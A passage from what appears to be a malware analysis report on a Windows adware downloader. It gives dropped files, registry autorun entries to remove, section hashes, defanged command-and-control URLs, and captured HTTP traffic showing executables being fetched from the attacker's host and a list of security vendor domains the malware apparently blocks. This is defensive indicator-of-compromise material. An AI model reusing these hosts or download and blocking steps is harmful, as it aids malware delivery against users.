    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\desktop.ini (67 bytes)
    C:\a\loogg2.txt (240 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\desktop.ini (67 bytes)
    C:\a\logff.txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\ckkkp[1].htm (324 bytes)
    C:\a\1logff.txt (718 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\aDYK287G2Jhwy64P0Ln0s.html (303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\inetc.dll (20 bytes)
    C:\a\1loogg2.txt (170 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\DYK287G2Jhwy64P0Ln0s.html (716 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\ns27.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsjB.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\apDYK287G2Jhwy64P0Ln0s.html (324 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\ckkk[1].htm (303 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\localhost[1].htm (716 bytes)
    C:\a\vv11111.txt (22835 bytes)
    C:\a\FiddlerCore.dll (9485 bytes)
    C:\a\zuur.txt (2 bytes)
    C:\a\internetport3.exe (10 bytes)
    C:\a\wcheckf.exe (397 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\System.dll (11 bytes)
    C:\a\zhho.txt (3 bytes)
    C:\a\zvchk.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\uniqueDYK287G2Jhwy64P0Ln0s[1].htm (10 bytes)
    %Program Files%\FastInternet\app.exe (1078 bytes)
    C:\a\29935426.bat (287 bytes)
    C:\a\winonit.exe (435 bytes)
    C:\a\DYK287G2Jhwy64P0Ln0s.exe (3808 bytes)
    C:\a\ayyyyy.txt (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\AccessControl.dll (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\inetc.dll (20 bytes)
    C:\a\ukey.ini (27 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\bdcount[1].htm (8 bytes)
    C:\a\zvv.txt (21 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\DYK287G2Jhwy64P0Ln0s[1].exe (3808 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\UAC.dll (13 bytes)
    C:\a\ver.ini (8 bytes)
    C:\a\getcap.exe (10027 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\pwgen.dll (17 bytes)
    C:\a\uniqueDYK287G2Jhwy64P0Ln0s.ini (10 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\intr.lnk (527 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\cki[1].htm (11 bytes)
    %System%\63839615.bat (19 bytes)
    C:\a\install.txt (1 bytes)
    %Program Files%\FastInternet\dotuninstall.exe (1084 bytes)
    C:\a\wincheckfe.exe (778 bytes)
    C:\a\lOD0hGDlkq.exe (5873 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsn2.tmp\SimpleFC.dll (5289 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "dutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "cutoauto" = "C:\a\wincheckfe.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "interpee" = "C:\a\internetport3.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "autoauto" = "63839615.bat"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "rutoauto" = "63839615.bat"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text409623628240644.46394856b32eb77dfd6fb67f21d6543272da5
.rdata28672476451203.4982dc77f8a1e6985a4361c55642680ddb4f
.data3686415471210243.32787922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata1925126553600d41d8cd98f00b204e9800998ecf8427e
.rsrc258048252825603.124033333d5ca3c163ed95562eb98d8231779

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:


Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
71cc6609b8db5735ef1d0cf991f0ee49
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
000b647a23034792225a3ab9da073d23
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269

Network Activity

URLs

URL IP
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877;81.17.31.2
hxxp://dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=481.17.31.2
hxxp://dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=481.17.31.2
hxxp://dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe81.17.31.2
hxxp://dotdo.net/act/exevc/vchk.exe81.17.31.2
hxxp://dotdo.net/act/txt/hho.txt81.17.31.2
hxxp://dotdo.net/act/txt/uur.txt81.17.31.2
hxxp://dotdo.net/act/txt/vv.txt81.17.31.2
hxxp://dotdo.net/act/txt/vchk.txt81.17.31.2
hxxp://dotdo.net/ckkkp.html81.17.31.2
hxxp://dotap.dotdo.net/act/txt/uur.txt81.17.31.2
hxxp://dotap.dotdo.net/act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=481.17.31.2
hxxp://dotap.dotdo.net/act/exevc/vchk.exe81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vchk.txt81.17.31.2
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=481.17.31.2
hxxp://dotdo.net/ckkk.html81.17.31.2
hxxp://dotap.dotdo.net/act/txt/hho.txt81.17.31.2
hxxp://dotap.dotdo.net/act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vv.txt81.17.31.2
fp0.dotdo.net109.123.123.124

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /act/exevc/vchk.exe HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:12 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT

ETag: "16a000000026349-ddb0-51dad696a4296"

Accept-Ranges: bytes

Content-Length: 56752

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: application/x-msdownload

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; HTTP/1.1

User-Agent: tota

Host: dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:04 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 11

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

...googgoodHTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:04 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..X-Powered-By: PHP/5.3.13..Content-Length: 11..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html.....googgood..

GET /act/txt/vchk.txt HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:13 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/html

2990..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOASPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePose.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePose.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.FragileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.SimpleforYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Hatchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.MountainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.exe.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.BrowserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOASPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.BetweenLines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHelper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTronic.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e

<<< skipped >>>

GET /ckkkp.html HTTP/1.0

User-Agent: tota

Host: dotdo.net

Connection: Keep-Alive

Pragma: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:40 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT

ETag: "100000000026c77-9f-508fdd8811aa8"

Accept-Ranges: bytes

Content-Length: 159

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:40 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..Content-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>....<mamoba>..</body>..</html>....

GET /act/bdcount.ini?uniqueid=DYK287G2Jhwy64P0Ln0s&type=1&reg=63839615.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:07 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 8

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

[a]..v=6....

GET /act/uniqueDYK287G2Jhwy64P0Ln0s.ini?rd=4 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:07 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 10

Keep-Alive: timeout=5, max=99

Connection: Keep-Alive

Content-Type: text/html

[a]..v=yes....

GET /act/exesbununique/DYK287G2Jhwy64P0Ln0s.exe HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:07 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

Last-Modified: Tue, 26 May 2015 16:50:52 GMT

ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"

Accept-Ranges: bytes

Content-Length: 57251

Keep-Alive: timeout=5, max=98

Connection: Keep-Alive

Content-Type: application/x-msdownload

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................................................................t.......................................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...................................rsrc................z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /ckkk.html HTTP/1.0

User-Agent: tota

Host: dotdo.net

Connection: Keep-Alive

Pragma: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:31 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT

ETag: "1d6000000029282-91-50a497515eff0"

Accept-Ranges: bytes

Content-Length: 145

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>..HTTP/1.1 200 OK..Date: Sat, 29 Aug 2015 11:59:31 GMT..Server: Apache/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<title>Untitled</title>..</head>..<body>..</body>..</html>......

GET /act/txt/hho.txt HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:12 GMT

Server: Apache/2.2.22 (Win64) PHP/5.3.13

X-Powered-By: PHP/5.3.13

Content-Length: 4084

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html

VVV.later-download.com.later-download.com.VVV.evodownload.com.evodownload.com.cdn.castplatform.com.m3.zlvijp.com.zonealarm.com.VVV.zonealarm.com.download.zonealarm.com.VVV.malwarebytes.org.malwarebytes.org.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.cdn.optimizely.com.fp114.digitaloptout.com.VVV.superfish.com.superfish.com.static.scanscout.com.z7hcp7lnkxu.st31g1duz2.com.ads.pubmatic.com.f-secure.com.VVV.f-secure.com.gripdownload.co.d.jazzedcdn.com.VVV.gripdownload.co.360safe.com.VVV.360safe.com.comodo.com.VVV.comodo.com.personalfirewall.comodo.com.comodo-internet-security.en.softonic.com.srv.quikdisplay.com.VVV.dimtron.com.dimtron.com.d.gettvwizard.com.d.instashareonline.com.instashareonline.com.VVV.instashareonline.com.apiboxrockinfo-a.akamaihd.net.b3.playfizz.com.apitechgilenet-a.akamaihd.net.d2d6i1lejl34hs.cloudfront.net.jelly.hatonafish.com.nps.donutleads.com.app.donutleads.com.istatic.datafastguru.info.pstatic.datafastguru.info.static.datafastguru.info.datafastguru.info.VVV.datafastguru.info.jsgnr.datafastguru.info.cdn.sharedaddomain.com.VVV.sharedaddomain.com.cdn.sharedaddomain.com.besttv39.cdn.it.best-tv.com.nps.donutleads.com.VVV.donutleads.com.donutleads.com.securepaths.com.VVV.securepaths.com.upgrade-software.org.VVV.upgrade-software.org.nps.pastaleads.com.pastaleads.com.www.pastaleads.com.app.pastaleads.com.74faa29e28b0e.com.VVV.74faa29e28b0e.com.VVV.safedownloadsrus108.com.safedownloadsrus108.com.VVV.v4download.com.v4download.com.VVV.v4download2.biz.v4download2.biz.VVV.4fbd0

<<< skipped >>>

GET /act/txt/uur.txt HTTP/1.1

User-Agent: tota

Host: dotap.dotdo.net

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Sat, 29 Aug 2015 11:59:12 GMT

